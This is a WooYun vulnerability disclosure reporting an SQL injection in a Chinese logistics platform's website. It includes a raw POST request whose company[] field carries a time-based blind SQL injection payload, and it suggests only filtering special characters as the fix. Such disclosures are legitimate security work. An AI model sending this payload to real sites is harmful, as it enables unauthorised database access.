当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162593

漏洞标题:绿蚂蚁物流平台主站SQL注入漏洞

相关厂商:绿蚂蚁物流

漏洞作者: 不败顽童

提交时间:2015-12-19 12:32

修复时间:2016-02-01 19:48

公开时间:2016-02-01 19:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

绿蚂蚁物流平台(sql注入)

详细说明:

POST /road/28373-39351/index.html HTTP/1.1
Content-Length: 3119
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: c8q_forward_url=http%3A%2F%2F**.**.**.**%2F; PHPSESSID=0baothikvjlq1f9d175m956f54
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
areaname1=0&areaname2=0&cartime%5b%5d=3&cartime%5b%5d=4&cartime%5b%5d=1&cartime%5b%5d=2&company%5b%5d=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&company%5b%5d=1017&company%5b%5d=1041&company%5b%5d=1033&company%5b%5d=880&company%5b%5d=9516&company%5b%5d=9158&company%5b%5d=872&company%5b%5d=11188&company%5b%5d=871&company%5b%5d=870&company%5b%5d=1048&company%5b%5d=886&company%5b%5d=878&company%5b%5d=1040&company%5b%5d=1016&company%5b%5d=879&company%5b%5d=1032&company%5b%5d=1024&company%5b%5d=9735&company%5b%5d=11019&company%5b%5d=9524&company%5b%5d=9794&company%5b%5d=11008&company%5b%5d=11010&company%5b%5d=10984&company%5b%5d=10994&company%5b%5d=11034&company%5b%5d=10993&company%5b%5d=11065&company%5b%5d=11072&company%5b%5d=11056&company%5b%5d=10997&company%5b%5d=11075&company%5b%5d=11050&company%5b%5d=11055&company%5b%5d=11043&company%5b%5d=11048&company%5b%5d=874&company%5b%5d=1044&company%5b%5d=1019&company%5b%5d=882&company%5b%5d=1036&company%5b%5d=883&company%5b%5d=875&company%5b%5d=1028&company%5b%5d=1020&company%5b%5d=1027&company%5b%5d=1034&company%5b%5d=1026&company%5b%5d=32613&company%5b%5d=1042&company%5b%5d=1018&company%5b%5d=1043&company%5b%5d=1035&company%5b%5d=881&company%5b%5d=873&company%5b%5d=885&company%5b%5d=877&company%5b%5d=1030&company%5b%5d=1022&company%5b%5d=869&company%5b%5d=1031&company%5b%5d=1023&company%5b%5d=1047&company%5b%5d=1039&company%5b%5d=1038&company%5b%5d=1037&company%5b%5d=1029&company%5b%5d=867&company%5b%5d=1045&company%5b%5d=1021&company%5b%5d=868&company%5b%5d=1046&company%5b%5d=884&company%5b%5d=876&company%5b%5d=9408&company%5b%5d=9310&company%5b%5d=11064&company%5b%5d=9287&company%5b%5d=6&company%5b%5d=9734&company%5b%5d=345&company%5b%5d=9324&company%5b%5d=6731&company%5b%5d=26799&company%5b%5d=352&company%5b%5d=3&company%5b%5d=348&company%5b%5d=27873&company%5b%5d=9787&company%5b%5d=9125&company%5b%5d=347&company%5b%5d=9255&company%5b%5d=11119&company%5b%5d=13553&company%5b%5d=14450&company%5b%5d=9858&company%5b%5d=13415&company%5b%5d=14478&company%5b%5d=14959&company%5b%5d=9792&company%5b%5d=6722&company%5b%5d=8903&company%5b%5d=8360&company%5b%5d=9531&company%5b%5d=9793&company%5b%5d=6798&company%5b%5d=321&company%5b%5d=9990&company%5b%5d=6762&company%5b%5d=9871&company%5b%5d=9980&company%5b%5d=6758&company%5b%5d=11004&company%5b%5d=10990&company%5b%5d=10989&company%5b%5d=11015&company%5b%5d=11016&company%5b%5d=9802&company%5b%5d=11017&company%5b%5d=11006&company%5b%5d=10992&company%5b%5d=11003&company%5b%5d=10998&company%5b%5d=10985&company%5b%5d=11035&company%5b%5d=11012&company%5b%5d=11036&company%5b%5d=10988&company%5b%5d=11014&company%5b%5d=11013&company%5b%5d=10999&company%5b%5d=346&company%5b%5d=14&company%5b%5d=344&company%5b%5d=9&company%5b%5d=9097&company%5b%5d=349&company%5b%5d=14817&company%5b%5d=351&company%5b%5d=322&company%5b%5d=14714&company%5b%5d=14712&company%5b%5d=14739&company%5b%5d=10983&company%5b%5d=11007&company%5b%5d=9539&company%5b%5d=14964&company%5b%5d=14695&company%5b%5d=14719&company%5b%5d=14711

漏洞证明:

2015-12-18_22-41-04.jpg


2015-12-18_23-11-24.jpg


2015-12-18_23-28-54.jpg


169张表啊,169张表啊,169张表啊,重要的事情说三遍

修复方案:

屏蔽特殊字符

版权声明:转载请注明来源 不败顽童@乌云


漏洞回应

厂商回应:

危害等级:暂时无回应

漏洞Rank:15

确认时间:2015-12-19 12:32

厂商回复:

最新状态:

暂无